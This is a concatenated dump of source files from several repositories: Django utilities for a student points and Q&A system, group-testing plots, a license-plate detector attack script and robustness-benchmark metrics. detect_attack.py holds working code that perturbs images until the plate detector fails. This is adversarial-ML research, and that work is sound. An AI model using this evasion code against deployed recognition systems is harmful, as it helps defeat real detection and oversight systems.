qa.status = QandA.Status.DELETE if qa.status == QandA.Status.IGNORE_RECEIVER else QandA.Status.IGNORE_SENDER
else:
qa.status = QandA.Status.DELETE if qa.status == QandA.Status.IGNORE_SENDER else QandA.Status.IGNORE_RECEIVER
qa.save()
def QA_delete(QA_id):
with transaction.atomic():
qa = QandA.objects.select_for_update().get(id=QA_id)
qa.status = QandA.Status.DELETE
qa.save()
def QA2Display(user):
all_instances = dict()
all_instances['send'], all_instances['receive'] = [], []
instances = {
"send": QandA.objects.activated(sender_flag=True).select_related('receiver').filter(sender=user).order_by("-Q_time"),
"receive": QandA.objects.activated(receiver_flag=True).select_related('sender').filter(receiver=user).order_by("-Q_time"),
}
me = NaturalPerson.objects.get(person_id=user) if hasattr(user, 'naturalperson') \
else Organization.objects.get(organization_id=user)
my_name = me.name if hasattr(user, "naturalperson") else me.oname
receiver_userids = instances['send'].values_list('receiver_id', flat=True)
sender_userids = instances['receive'].values_list('sender_id', flat=True)
sender_persons = NaturalPerson.objects.filter(person_id__in=sender_userids).values_list('person_id', 'name')
sender_persons = {userid: name for userid, name in sender_persons}
sender_orgs = Organization.objects.filter(organization_id__in=sender_userids).values_list('organization_id', 'oname')
sender_orgs = {userid: name for userid, name in sender_orgs}
receiver_persons = NaturalPerson.objects.filter(person_id__in=receiver_userids).values_list('person_id', 'name')
receiver_persons = {userid: name for userid, name in receiver_persons}
receiver_orgs = Organization.objects.filter(organization_id__in=receiver_userids).values_list('organization_id', 'oname')
receiver_orgs = {userid: name for userid, name in receiver_orgs}
for qa in instances['send']:
send_QAs = dict()
send_QAs['sender'] = my_name
if qa.anonymous_flag:
send_QAs['sender'] += "(匿名)"
_, user_type, _ = utils.check_user_type(qa.receiver)
if user_type == "Organization":
send_QAs["receiver"] = receiver_orgs.get(qa.receiver_id)
else:
send_QAs["receiver"] = receiver_persons.get(qa.receiver_id)
send_QAs['Q_text'] = qa.Q_text
send_QAs['A_text'] = qa.A_text
send_QAs['Q_time'] = qa.Q_time
send_QAs['A_time'] = qa.A_time
send_QAs['id'] = qa.id
send_QAs['anwser_flag'] = (len(qa.A_text) != 0)
all_instances['send'].append(send_QAs)
for qa in instances['receive']:
receive_QAs = dict()
if qa.anonymous_flag:
receive_QAs['sender'] = "匿名者"
else:
_, user_type, _ = utils.check_user_type(qa.sender)
if user_type == "Organization":
receive_QAs["sender"] = sender_orgs.get(qa.sender_id)
else:
receive_QAs["sender"] = sender_persons.get(qa.sender_id)
receive_QAs['receiver'] = my_name
receive_QAs['Q_text'] = qa.Q_text
receive_QAs['A_text'] = qa.A_text
receive_QAs['Q_time'] = qa.Q_time
receive_QAs['A_time'] = qa.A_time
receive_QAs['id'] = qa.id
receive_QAs['anwser_flag'] = (len(qa.A_text) != 0)
all_instances['receive'].append(receive_QAs)
return all_instances
```
#### File: YPPF/app/YQPoint_utils.py
```python
from app.utils_dependency import *
from app.models import (
NaturalPerson,
Organization,
YQPointDistribute,
TransferRecord,
Notification,
)
from datetime import datetime, timedelta
from django.db.models import F
from app.scheduler import scheduler
__all__ = [
# 'distribute_YQPoint',
'add_YQPoints_distribute',
'confirm_transaction',
'record2Display',
]
def _distribute_YQPoint_to_users(proposer, recipients, YQPoints, trans_time):
'''
内容:
由proposer账户(默认为一个小组账户),向每一个在recipients中的账户中发起数额为YQPoints的转账
并且自动生成默认为ACCEPTED的转账记录以便查阅
这里的recipients期待为一个Queryset,要么全为自然人,要么全为小组
proposer默认为一个小组账户
'''
try:
assert proposer.YQPoint >= recipients.count() * YQPoints
except:
# 说明此时proposer账户的元气值不足
print(
f"由{proposer}向自然人{recipients[:3]}...等{recipients.count()}个用户"
+ "发放元气值失败,原因可能是{proposer}的元气值剩余不足"
)
try:
is_nperson = isinstance(recipients[0], NaturalPerson) # 不为自然人则为小组
except:
print("没有转账对象!")
return
# 更新元气值
recipients.update(YQPoint=F('YQPoint') + YQPoints)
proposer.YQPoint -= recipients.count() * YQPoints
proposer.save()
# 生成转账记录
trans_msg = f"{proposer}向您发放了{YQPoints}元气值,请查收!"
transfer_list = [TransferRecord(
proposer=proposer.organization_id,
recipient=(recipient.person_id if is_nperson else recipient.organization_id),
amount=YQPoints,
start_time=trans_time,
finish_time=trans_time,
message=trans_msg,
status=TransferRecord.TransferStatus.ACCEPTED
) for recipient in recipients]
TransferRecord.objects.bulk_create(transfer_list)
def distribute_YQPoint(distributer):
'''
调用_distribute_YQPoint_to_users, 给大家发放元气值
这个函数的内容:根据distributer,找到发放对象,调用函数完成发放,(统计时间)
distributer应该为一个YQPointDistribute类的实例
'''
trans_time = distributer.start_time
# 没有问题,找到要发放元气值的人和小组
per_to_dis = NaturalPerson.objects.activated().filter(
YQPoint__lte=distributer.per_max_dis_YQP)
org_to_dis = Organization.objects.activated().filter(
YQPoint__lte=distributer.org_max_dis_YQP).exclude(oname=YQP_ONAME)
# 由学院账号给大家发放
YPcollege = Organization.objects.get(oname=YQP_ONAME)
_distribute_YQPoint_to_users(proposer=YPcollege,
recipients=per_to_dis,
YQPoints=distributer.per_YQP,
trans_time=trans_time)
_distribute_YQPoint_to_users(proposer=YPcollege,
recipients=org_to_dis,
YQPoints=distributer.org_YQP,
trans_time=trans_time)
end_time = datetime.now()
diff_time = end_time - trans_time
debug_msg = (
f"已向{per_to_dis.count()}个自然人和{org_to_dis.count()}个小组转账,"
+ f"用时{diff_time.seconds}s,{diff_time.microseconds}microsecond\n"
)
print(debug_msg)
def add_YQPoints_distribute(dtype):
'''
内容:
用于注册已知type=dtype的发放元气值的实例
每种类型(临时发放、每周发放、每两周发放)都必须只有一个正在应用的实例;
在注册时,如果已经有另一个正在进行的、类型相同的定时任务,会覆盖
暂时还没写怎么取消
'''
try:
distributer = YQPointDistribute.objects.get(type=dtype, status=True)
except Exception as e:
print(f"按类型{dtype}注册任务失败,原因可能是没有状态为YES或者有多个状态为YES的发放实例\n{e}")
if dtype == YQPointDistribute.DistributionType.TEMPORARY:
# 说明此时是临时发放
scheduler.add_job(distribute_YQPoint,
"date",
id="temporary_YQP_distribute",
run_date=distributer.start_time,
args=[distributer])
else:
# 说明此时是定期发放
scheduler.add_job(distribute_YQPoint,
"interval",
id=f"{dtype}weeks_interval_YQP_distribute",
weeks=distributer.type,
next_run_time=distributer.start_time,
args=[distributer])
@log.except_captured(source='YQPoint_utils[confirm_transaction]', record_user=True)
def confirm_transaction(request, tid=None, reject=None):
# 导入关系不正常,可再优化
from app.notification_utils import notification_create, notification_status_change
from app.wechat_send import publish_notification, WechatApp
context = dict()
context["warn_code"] = 1 # 先假设有问题
new_notification = None
with transaction.atomic():
try:
record = TransferRecord.objects.select_for_update().get(
id=tid, recipient=request.user
)
except Exception as e:
context["warn_message"] = "交易遇到问题, 请联系管理员!" + str(e)
return context
if record.status != TransferRecord.TransferStatus.WAITING:
context["warn_message"] = "交易已经完成, 请不要重复操作!"
return context
payer = record.proposer
try:
if hasattr(payer, "naturalperson"):
payer = (
NaturalPerson.objects.activated()
.select_for_update()
.get(person_id=payer)
)
else:
payer = Organization.objects.select_for_update().get(
organization_id=payer
)
except:
context["warn_message"] = "交易对象不存在或已毕业, 请联系管理员!"
return context
recipient = record.recipient
if hasattr(recipient, "naturalperson"):
recipient = (
NaturalPerson.objects.activated()
.select_for_update()
.get(person_id=recipient)
)
else:
recipient = Organization.objects.select_for_update().get(
organization_id=recipient
)
if reject is True:
record.status = TransferRecord.TransferStatus.REFUSED
payer.YQPoint += record.amount
payer.save()
context["warn_message"] = "拒绝转账成功!"
new_notification = notification_create(
receiver=record.proposer,
sender=record.recipient,
typename=Notification.Type.NEEDREAD,
title=Notification.Title.TRANSFER_FEEDBACK,
content=f"{str(recipient)}拒绝了您的转账。",
URL="/myYQPoint/",
)
notification_status_change(record.transfer_notification.get().id)
else:
record.status = TransferRecord.TransferStatus.ACCEPTED
recipient.YQPoint += record.amount
recipient.save()
context["warn_message"] = "交易成功!"
new_notification = notification_create(
receiver=record.proposer,
sender=record.recipient,
typename=Notification.Type.NEEDREAD,
title=Notification.Title.TRANSFER_FEEDBACK,
content=f"{str(recipient)}接受了您的转账。",
URL="/myYQPoint/",
)
notification_status_change(record.transfer_notification.get().id)
publish_notification(new_notification, app=WechatApp.TRANSFER)
record.finish_time = datetime.now() # 交易完成时间
record.save()
context["warn_code"] = 2
return context
context["warn_message"] = "交易遇到问题, 请联系管理员!"
return context
@log.except_captured(source='YQPoint_utils[record2Display]')
def record2Display(record_list, user): # 对应myYQPoint函数中的table_show_list
lis = []
amount = {"send": 0.0, "recv": 0.0}
# 储存这个列表中所有record的元气值的和
for record in record_list:
lis.append({})
# 确定类型
record_type = "send" if record.proposer.username == user.username else "recv"
# id
lis[-1]["id"] = record.id
# 时间
lis[-1]["start_time"] = record.start_time.strftime("%Y-%m-%d %H:%M")
if record.finish_time is not None:
lis[-1]["finish_time"] = record.finish_time.strftime("%Y-%m-%d %H:%M")
# 对象
# 如果是给出列表,那么对象就是接收者
obj_user = record.recipient if record_type == "send" else record.proposer
lis[-1]["obj_direct"] = "To " if record_type == "send" else "From"
if hasattr(obj_user, "naturalperson"): # 如果OneToOne Field在个人上
lis[-1]["obj"] = obj_user.naturalperson.name
lis[-1]["obj_url"] = "/stuinfo/?name=" + lis[-1]["obj"] + "+" + str(obj_user.id)
else:
lis[-1]["obj"] = obj_user.organization.oname
lis[-1]["obj_url"] = "/orginfo/?name=" + lis[-1]["obj"]
# 金额
lis[-1]["amount"] = record.amount
amount[record_type] += record.amount
# 留言
lis[-1]["message"] = record.message
lis[-1]["if_act_url"] = False
if record.corres_act is not None:
lis[-1]["message"] = "报名活动" + record.corres_act.title
# TODO 这里还需要补充一个活动跳转链接
# 状态
if record.status == TransferRecord.TransferStatus.PENDING:
# PENDING 就不对个人可见了,个人看到的就是元气值已经转过去了
lis[-1]["status"] = "已接收"
else:
lis[-1]["status"] = record.get_status_display()
# 对外展示为 1/10
"""
统一在前端修改
for key in amount:
amount[key] = amount[key]/10
"""
# 由于误差, 将amount调整为小数位数不超过2
for key in amount.keys():
amount[key] = round(amount[key], 1)
return lis, amount
``` |
{
"source": "jiayuewan/group-testing-with-household-correlation",
"score": 2
} |
#### File: src/deprecated/counterexample.py
```python
import numpy as np
import matplotlib
import matplotlib.cm
cmap = matplotlib.cm.get_cmap().copy()
cmap.set_bad('white',np.nan)
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
theta1_list = np.linspace(0.01, 1, 100)
theta2_list = np.linspace(0.01, 1, 100)
num_grid = len(theta1_list)
n=2
alpha=0.01
num_grid = len(theta1_list)
def compute_np_beta(alpha, theta1, theta2):
return (1 - alpha * (7/12*theta2**2 + 7/12*5/12*theta2 + 5**2/12**2) \
- (1-alpha) * (7/12*theta1*theta2+5/12*theta1))
def compute_np_eta(alpha, theta1, theta2, np_beta, n=2):
denom = n * alpha * (1-np_beta)
num = n * (theta1 * 2 * alpha * (1-alpha)\
+ theta2 * alpha**2 * ((7/12)**2 + 2 * 7/12 * 5/12)\
+ alpha**2 * (5/12)**2)
return num/denom
def compute_np_efficiency(n, alpha, eta, beta):
inv_eff = 1/n + alpha * eta * (1-beta)
return 1/inv_eff
def compute_cp_efficiency(n, alpha, theta1, theta2):
cp_inv_eff = 1/n + alpha * n * (8*theta1+2*theta2)/(5*theta1+3*theta1*theta2+4*theta2**2)*(theta1*theta2/4 + theta2**2/3 + 5*theta1/12)
return 1/cp_inv_eff
def plot_diff_efficiency():
diff_eff_vals = np.empty((num_grid, num_grid))
diff_eff_vals[:] = np.nan
for i in range(num_grid):
for j in range(i, num_grid):
np_beta = compute_np_beta(alpha, theta1_list[i], theta2_list[j])
np_eta = compute_np_eta(alpha, theta1_list[i], theta2_list[j], np_beta)
np_eff = compute_np_efficiency(n, alpha, np_eta, np_beta)
cp_eff = compute_cp_efficiency(n, alpha, theta1_list[i], theta2_list[j])
diff_eff_vals[i,j] = cp_eff - np_eff
data = diff_eff_vals.transpose()
fig, ax = plt.subplots()
im = ax.imshow(data, cmap = cmap, extent = [0, 100, 100, 0])
cbar = ax.figure.colorbar(im, ax=ax)
ax.set_xlabel(r'$\theta_1$')
ax.set_ylabel(r'$\theta_2$')
ax.set_title("Difference in efficiency \n between correlated and naive pooling")
fig.tight_layout()
#plt.show()
plt.contour(data, levels = [0], colors = 'r', linewidth=5)
ax.hlines(y=100, xmin=0, xmax=49, color='r', linestyle='-', linewidth=5)
ax.vlines(x=0.1, ymin=2, ymax=100, color='r', linestyle='-', linewidth=5)
plt.savefig('/home/yz685/group-testing-with-household-correlation/figs/counterexample.pdf', format='pdf', dpi=600, bbox_inches='tight')
if __name__ == '__main__':
plt.rcParams["font.family"] = 'serif'
plot_diff_efficiency()
```
#### File: group-testing-with-household-correlation/src/eval_p_index.py
```python
from scipy.optimize import fsolve
import numpy as np
from household_dist import HOUSEHOLD_DIST
def compute_household_infection_prob(prevalence, household_dist, SAR=0.3741):
"""
computes the probability that a household is infected given population level prevalence,
household size distribution and household secondary attack rate
INPUT:
prevalence = population level prevalence
household_dist = array-like, probability distribution of household sizes 1, 2, 3, ...
SAR = household secondary attack rate
"""
assert(np.absolute(np.sum(household_dist) - 1) < 1e-6)
exp_household_size = 0
exp_household_infection_multiplier = 0
for i in range(len(household_dist)):
exp_household_size += (i + 1) * household_dist[i]
exp_household_infection_multiplier += (1 + (i + 1 - 1) * SAR) * household_dist[i]
p = prevalence * exp_household_size / exp_household_infection_multiplier
return p
# deprecated, modified from Massey's groupt testing code
def match_prevalence(p_index, target_prevalence, household_dist, SAR):
# computes probability of a primary case given population level prevalence, household size distribution,
# and household secondary attack rate
# INPUT:
# p_index = probability of a primary case in the household
# target_prevalence = population level prevalence
# household_dist = probability distribution of household sizes 1,2,3,...
# SAR = household secondary attack rate
assert(np.absolute(np.sum(household_dist) - 1) < 1e-6)
exp_household_size = 0
for i in range(len(household_dist)):
exp_household_size += (i + 1) * household_dist[i]
frac_tot_infected = 0
for i in range(len(household_dist)):
frac_tot_infected += (i + 1) * (p_index + SAR * (1 - p_index) - SAR * (1 - p_index) ** (i + 1)) * household_dist[
i] / exp_household_size
return frac_tot_infected - target_prevalence
# deprecated, modified from Massey's group testing code
def eval_p_index(match_prevalence, target_prevalence, household_dist, SAR=0.3741):
return fsolve(match_prevalence, 0.005, args=(target_prevalence, household_dist, SAR))
if __name__ == '__main__':
household_dist = HOUSEHOLD_DIST['US']
print("household infection probability (US population): " + str(compute_household_infection_prob(0.01, household_dist)))
print("household infection probability (household size = 3): " + str(compute_household_infection_prob(0.01, household_dist=[0,0,1])))
```
#### File: group-testing-with-household-correlation/src/plot_VL_and_table4.py
```python
import numpy as np
import matplotlib.pyplot as plt
def plot_VL(n_samples = 1000000):
mixture_weights = [0.33, 0.54, 0.13]
mixture_params = [[8.09, 1.06], [5.35, 0.89], [3.75, 0.39]]
samples = []
for _ in range(n_samples):
component = np.random.choice(3, p = mixture_weights)
mean, sd = mixture_params[component]
samples.append(np.random.normal(loc = mean, scale = sd))
plt.rcParams["font.family"] = 'serif'
plt.hist(samples, bins = 100, density = True)
plt.title('log10 viral load distribution')
plt.xlabel('log10 viral load')
plt.ylabel('Density')
# plt.savefig('log10_VL_density.pdf')
def plot_table_4():
prevs = ['0.1%', '0.5%', '1%', '5%', '10%']
np_sizes = [40, 15, 12, 6, 4]
cp_sizes = [40, 20, 12, 6, 4]
np_sens_times_eff = [13.52, 6.29, 4.56, 2.17, 1.59]
cp_sens_times_eff = [15.86, 7.26, 5.23, 2.44, 1.72]
plt.rcParams["font.family"] = 'serif'
plt.plot(np.arange(5), [1/np_sens_times_eff[i] for i in range(5)],
color = 'mediumpurple', marker = '^', linestyle = '--', label = 'naive')
plt.plot(np.arange(5), [1/cp_sens_times_eff[i] for i in range(5)],
color = 'mediumaquamarine', marker = 'o', linestyle = '-', label = 'correlated')
plt.xticks(np.arange(5), prevs)
for i in range(5):
plt.annotate(np_sizes[i], (i-0.2, 1/np_sens_times_eff[i]))
plt.annotate(cp_sizes[i], (i+0.11, 1/cp_sens_times_eff[i]-0.01))
plt.xlabel('Prevalence')
plt.ylabel(r'$(Sensitivity * Efficiency)^{-1}$')
plt.legend()
plt.title(r'$(Sensitivity * Efficiency)^{-1}$ for naive and correlated pooling')
# plt.savefig('sens_eff.pdf')
``` |
{
"source": "jiayunhan/deep-anpr",
"score": 2
} |
#### File: jiayunhan/deep-anpr/detect_attack.py
```python
__all__ = (
'detect',
'post_process',
)
import collections
import itertools
import math
import sys
import cv2
import numpy
import tensorflow as tf
import common
import model
from detect_get_logits import get_attack_logits
def make_scaled_ims(im, min_shape):
ratio = 1. / 2 ** 0.5
shape = (im.shape[0] / ratio, im.shape[1] / ratio)
while True:
shape = (int(shape[0] * ratio), int(shape[1] * ratio))
if shape[0] < min_shape[0] or shape[1] < min_shape[1]:
break
yield cv2.resize(im, (shape[1], shape[0]))
def detect(im, param_vals):
"""
Detect number plates in an image.
:param im:
Image to detect number plates in.
:param param_vals:
Model parameters to use. These are the parameters output by the `train`
module.
:returns:
Iterable of `bbox_tl, bbox_br, letter_probs`, defining the bounding box
top-left and bottom-right corners respectively, and a 7,36 matrix
giving the probability distributions of each letter.
"""
# Convert the image to various scales.
scaled_ims = list(make_scaled_ims(im, model.WINDOW_SHAPE))
#scaled_ims = hide_attack(im, param_vals)
#print(scaled_ims[0].shape)
# Load the model which detects number plates over a sliding window.
x, y, params = model.get_detect_model()
# Execute the model at each scale.
with tf.Session(config=tf.ConfigProto()) as sess:
y_vals = []
for scaled_im in scaled_ims:
feed_dict = {x: numpy.stack([scaled_im])}
feed_dict.update(dict(zip(params, param_vals)))
y_vals.append(sess.run(y, feed_dict=feed_dict))
print(y_vals[0].shape)
# Interpret the results in terms of bounding boxes in the input image.
# Do this by identifying windows (at all scales) where the model predicts a
# number plate has a greater than 50% probability of appearing.
#
# To obtain pixel coordinates, the window coordinates are scaled according
# to the stride size, and pixel coordinates.
count = 0
for i, (scaled_im, y_val) in enumerate(zip(scaled_ims, y_vals)):
for window_coords in numpy.argwhere(y_val[0, :, :, 0] >
-math.log(1./0.99 - 1)):
count = count + 1
letter_probs = (y_val[0,
window_coords[0],
window_coords[1], 1:].reshape(
7, len(common.CHARS)))
letter_probs = common.softmax(letter_probs)
img_scale = float(im.shape[0]) / scaled_im.shape[0]
bbox_tl = window_coords * (8, 4) * img_scale
bbox_size = numpy.array(model.WINDOW_SHAPE) * img_scale
present_prob = common.sigmoid(
y_val[0, window_coords[0], window_coords[1], 0])
yield bbox_tl, bbox_tl + bbox_size, present_prob, letter_probs
#print("Detected count: ", count)
def detect_max_shape(im, param_vals):
scaled_ims = list(make_scaled_ims(im, model.WINDOW_SHAPE))
x, y, params = model.get_detect_model()
# Execute the model at each scale.
with tf.Session(config=tf.ConfigProto()) as sess:
y_vals = []
for scaled_im in scaled_ims:
feed_dict = {x: numpy.stack([scaled_im])}
feed_dict.update(dict(zip(params, param_vals)))
y_vals.append(sess.run(y, feed_dict=feed_dict))
# Interpret the results in terms of bounding boxes in the input image.
# Do this by identifying windows (at all scales) where the model predicts a
# number plate has a greater than 50% probability of appearing.
#
# To obtain pixel coordinates, the window coordinates are scaled according
# to the stride size, and pixel coordinates.
max_im = scaled_ims[0]
max_prob = 0
for i, (scaled_im, y_val) in enumerate(zip(scaled_ims, y_vals)):
for window_coords in numpy.argwhere(y_val[0, :, :, 0] >
-math.log(1./0.99 - 1)):
letter_probs = (y_val[0,
window_coords[0],
window_coords[1], 1:].reshape(
7, len(common.CHARS)))
letter_probs = common.softmax(letter_probs)
img_scale = float(im.shape[0]) / scaled_im.shape[0]
bbox_tl = window_coords * (8, 4) * img_scale
bbox_size = numpy.array(model.WINDOW_SHAPE) * img_scale
present_prob = common.sigmoid(
y_val[0, window_coords[0], window_coords[1], 0])
if(present_prob > max_prob):
max_prob = present_prob
max_im = scaled_im
return max_im.shape
def isDetected(im, param_vals):
im_gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY) / 255.
scaled_ims = list(make_scaled_ims(im_gray, model.WINDOW_SHAPE))
x, y, params = model.get_detect_model()
with tf.Session(config=tf.ConfigProto()) as sess:
y_vals = []
for scaled_im in scaled_ims:
feed_dict = {x: numpy.stack([scaled_im])}
feed_dict.update(dict(zip(params, param_vals)))
y_vals.append(sess.run(y, feed_dict=feed_dict))
count = 0
for i, (scaled_im, y_val) in enumerate(zip(scaled_ims, y_vals)):
for window_coords in numpy.argwhere(y_val[0, :, :, 0] > -math.log(1./0.99 - 1)):
count = count + 1 #only care about number of boxes it can detect
print("COUNT: ", count)
return count != 0
def original_img_hide_attack_color(im, param_vals):
def perturb(img, param_vals):
x_origin = tf.Variable(tf.zeros(img.shape))
assign_origin_op = tf.assign(x_origin, img)
#convert image to gray so it can pass through detect model
im_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) / 255.
#resize colored image to match best scaled image shape
max_im_shape = detect_max_shape(im_gray, param_vals)
im_color_resize = tf.squeeze(tf.image.resize_images(x_origin, (max_im_shape[0], max_im_shape[1])))
img_gray = tf.image.rgb_to_grayscale(im_color_resize) #(250,250,1)
im_gray = tf.squeeze(tf.cast(img_gray, numpy.float32)) #(250,250)
input = tf.stack([im_gray]) #(1,250,250)
_, y, params = model.get_detect_model(input)
#mean over reduced probability for presence and letter detection, y[:,:,:,0] for just presence
y_mean = tf.reduce_mean(y)
optim_step = tf.train.GradientDescentOptimizer(3).minimize(y_mean, var_list = [x_origin])
adv = []
#create bounds for how far the image can deviate
epsilon = tf.placeholder(tf.float32, ())
below = img - epsilon
above = img + epsilon
projected = tf.clip_by_value(tf.clip_by_value(x_origin, below, above), 0, 255)
with tf.control_dependencies([projected]):
project_step = tf.assign(x_origin, projected)
#training
with tf.Session(config=tf.ConfigProto()) as sess:
sess.run(assign_origin_op)
feed_dict = {}
feed_dict.update(dict(zip(params, param_vals)))
for i in range(400):
sess.run(optim_step,feed_dict = feed_dict)
sess.run(project_step, feed_dict = {epsilon: 8000/255.0})
print(sess.run(y_mean, feed_dict = feed_dict))
if(isDetected(x_origin.eval().astype(numpy.uint8), param_vals) == False):
break
adv = (x_origin.eval().astype(numpy.uint8))
return adv
return perturb(im, param_vals)
def _overlaps(match1, match2):
bbox_tl1, bbox_br1, _, _ = match1
bbox_tl2, bbox_br2, _, _ = match2
return (bbox_br1[0] > bbox_tl2[0] and
bbox_br2[0] > bbox_tl1[0] and
bbox_br1[1] > bbox_tl2[1] and
bbox_br2[1] > bbox_tl1[1])
def _group_overlapping_rectangles(matches):
matches = list(matches)
num_groups = 0
match_to_group = {}
for idx1 in range(len(matches)):
for idx2 in range(idx1):
if _overlaps(matches[idx1], matches[idx2]):
match_to_group[idx1] = match_to_group[idx2]
break
else:
match_to_group[idx1] = num_groups
num_groups += 1
groups = collections.defaultdict(list)
for idx, group in match_to_group.items():
groups[group].append(matches[idx])
return groups
def post_process(matches):
"""
Take an iterable of matches as returned by `detect` and merge duplicates.
Merging consists of two steps:
- Finding sets of overlapping rectangles.
- Finding the intersection of those sets, along with the code
corresponding with the rectangle with the highest presence parameter.
"""
groups = _group_overlapping_rectangles(matches)
for group_matches in groups.values():
mins = numpy.stack(numpy.array(m[0]) for m in group_matches)
maxs = numpy.stack(numpy.array(m[1]) for m in group_matches)
present_probs = numpy.array([m[2] for m in group_matches])
letter_probs = numpy.stack(m[3] for m in group_matches)
yield (numpy.max(mins, axis=0).flatten(),
numpy.min(maxs, axis=0).flatten(),
numpy.max(present_probs),
letter_probs[numpy.argmax(present_probs)])
def print_help():
print("\nToo few arguments. Expected: 3")
print("Usage: python detect.py [input_image] [weights] [output_image]\n")
def letter_probs_to_code(letter_probs):
return "".join(common.CHARS[i] for i in numpy.argmax(letter_probs, axis=1))
if __name__ == "__main__":
if(len(sys.argv)<4):
print_help()
exit()
f = numpy.load(sys.argv[2])
param_vals = [f[n] for n in sorted(f.files, key=lambda s: int(s[4:]))]
im = cv2.imread(sys.argv[1])
img_color = original_img_hide_attack_color(im, param_vals)
im_gray = cv2.cvtColor(img_color, cv2.COLOR_BGR2GRAY) / 255.
#print(img_color)
cv2.imwrite('perturbed' + sys.argv[3], img_color)
for pt1, pt2, present_prob, letter_probs in post_process(
detect(im_gray, param_vals)):
pt1 = tuple(reversed(map(int, pt1)))
pt2 = tuple(reversed(map(int, pt2)))
code = letter_probs_to_code(letter_probs)
color = (0.0, 255.0, 0.0)
cv2.rectangle(im, pt1, pt2, color)
cv2.putText(im,
code,
pt1,
cv2.FONT_HERSHEY_PLAIN,
1.5,
(0, 0, 0),
thickness=5)
cv2.putText(im,
code,
pt1,
cv2.FONT_HERSHEY_PLAIN,
1.5,
(255, 255, 255),
thickness=2)
cv2.imwrite(sys.argv[3], im)
``` |
{
"source": "jiayunhan/perceptron-benchmark",
"score": 3
} |
#### File: perceptron/benchmarks/gaussian_blur.py
```python
import numpy as np
from tqdm import tqdm
from collections import Iterable
from scipy.ndimage.filters import gaussian_filter
from .base import Metric
from .base import call_decorator
class GaussianBlurMetric(Metric):
"""Metric that tests models against Gaussian blurs."""
@call_decorator
def __call__(self, adv, annotation=None, unpack=True,
abort_early=True, epsilons=10000):
"""Blurs the image until it is misclassified.
Parameters
----------
adv : `numpy.ndarray`
The original, unperturbed input as a `numpy.ndarray`.
annotation : int
The reference label of the original input.
unpack : bool
If true, returns the adversarial input, otherwise returns
the Adversarial object.
abort_early : bool
If true, returns when got first adversarial, otherwise
returns when all the iterations are finished.
epsilons : int or Iterable[float]
Either Iterable of standard deviations of the Gaussian blur
or number of standard deviations between 0 and 1 that should
be tried.
"""
a = adv
del adv
del annotation
del unpack
image = a.original_image
min_, max_ = a.bounds()
axis = a.channel_axis(batch=False)
hw = [image.shape[i] for i in range(image.ndim) if i != axis]
h, w = hw
size = max(h, w)
if not isinstance(epsilons, Iterable):
epsilons = np.linspace(0, 0.2, num=epsilons + 1)[1:]
for epsilon in tqdm(epsilons):
# epsilon = 1 will correspond to
# sigma = size = max(width, height)
sigmas = [epsilon * size] * 3
sigmas[axis] = 0
blurred = gaussian_filter(image, sigmas)
blurred = np.clip(blurred, min_, max_)
_, is_adversarial = a.predictions(blurred)
if is_adversarial and abort_early:
return
```
#### File: perceptron/benchmarks/interval_analysis.py
```python
import warnings
import logging
import numpy as np
from tqdm import tqdm
from abc import ABC
from abc import abstractmethod
from .base import Metric
from .base import call_decorator
from perceptron.utils.image import onehot_like
from perceptron.utils.func import to_tanh_space
from perceptron.utils.func import to_model_space
from perceptron.utils.func import AdamOptimizer
from perceptron.utils.interval_analyze import symbolic, naive
class IntervalMetric(Metric, ABC):
"""The base class of interval analysis used for network
formal verifications.
This verification method is described in [1,2]_. This
implementation is based on the symbolic interval lib
in [3]_.
References
----------
.. [1] <NAME>, <NAME>, <NAME>, <NAME>,
<NAME>ana : "Formal Security Analysis of Neural Networks
using Symbolic Intervals", https://arxiv.org/abs/1804.10829
.. [2] <NAME>, <NAME>, <NAME>, <NAME>,
<NAME>ana : "Efficient Formal Safety Analysis of Neural
Networks", https://arxiv.org/abs/1809.08098
.. [3] https://github.com/tcwangshiqi-columbia/symbolic_interval
"""
@call_decorator
def __call__(self, adv, optimal_bound=False, epsilon=None,
parallel=False, unpack=False, annotation=None,
normalize=False, threshold=0.001):
""" The Linf version of interval analysis. It will add two
parameters into adversarial: (1) is_verified: whether the
sample is verified to be safe under given epsilon;
(2) opt: the optimal bound for verifying the property safe
Parameters
----------
adv : An class:`Adversarial` instance
Keep all the information needed
optimal_bound : Bool
Whether we need to locate the minimal Linf bound that
can be verified to be safe.
epsilon : float
The Linf epsilon range.
If optimal_bound is False, it will serve as the testing epsilon.
If optimal_bound is True, it will serve as the starting epsilon
for searching the optimal one.
parallel : Bool
whether to parallelize the testing
unpack : bool
If true, returns the adversarial input, otherwise returns
the Adversarial object.
annotation : int
The reference label of the original input.
normalize : Bool
Whether the input is normalized. Usually, MNIST will not be
normalized while cifar10 will be normalized with 0.225.
threshold : float
The minimal threshold for the binary search
"""
assert epsilon is not None, "Provide an epsilon for verification!"
a = adv
del adv
del annotation
if not optimal_bound:
is_verified = self.analyze(a, epsilon, parallel=parallel)
if is_verified:
print("The model is proved to be safe with "
"given epsilon {0:.3f}".format(epsilon))
else:
print("Can not be verified with given "
"epsilon {0:.3f}".format(epsilon))
if optimal_bound:
opt = self.analyze_bound(a, epsilon, threshold=0.001, parallel=parallel)
if normalize:
opt = opt * 0.225 * 255
else:
opt = opt * 255
print("optimal bound found to be {0:.3f} out of 0 to 255".format(opt))
# Avoid warning for not finding the adversarial examples
a._best_adversarial = a._original_image
return None
def analyze(self, adv, epsilon, parallel=False):
"""To be extended with different interval analysis methods."""
raise NotImplementedError
def analyze_bound(self, adv, epsilon, threshold=0.001, parallel=False):
""" Return the optimal bound provided by interval analysis.
It indicates the largest Linf bound that is verified to be
absent of adversarial examples under arbitrary attacks. The
optimal bound is located by binary search.
Parameters
----------
adv : An class:`Adversarial` instance
Keep all the information needed
epsilon : float
The Linf epsilon range. Serves as the starting epsilon
for searching the optimal one.
threshold : float
The minimal threshold for the binary search
parallel : Bool
whether to parallelize the testing
"""
bound = epsilon
upper_bound = 1
lower_bound = 0
# binary search for the optimal bound
while upper_bound - lower_bound > threshold:
is_verified = self.analyze(adv, bound, parallel=parallel)
if is_verified:
# print("The model is proved to be safe with given epsilon", bound)
lower_bound = bound
else:
# print("can not be verified with given epsilon", bound)
upper_bound = bound
bound = (upper_bound + lower_bound) / 2.0
return bound
class SymbolicIntervalMetric(IntervalMetric):
@staticmethod
def analyze(adv, epsilon, parallel=False):
""" Return whether the example is verified to be save
within the given Linf <= epsilon analyzed by symbolic
interval analysis.
Parameters
----------
adv : An class:`Adversarial` instance
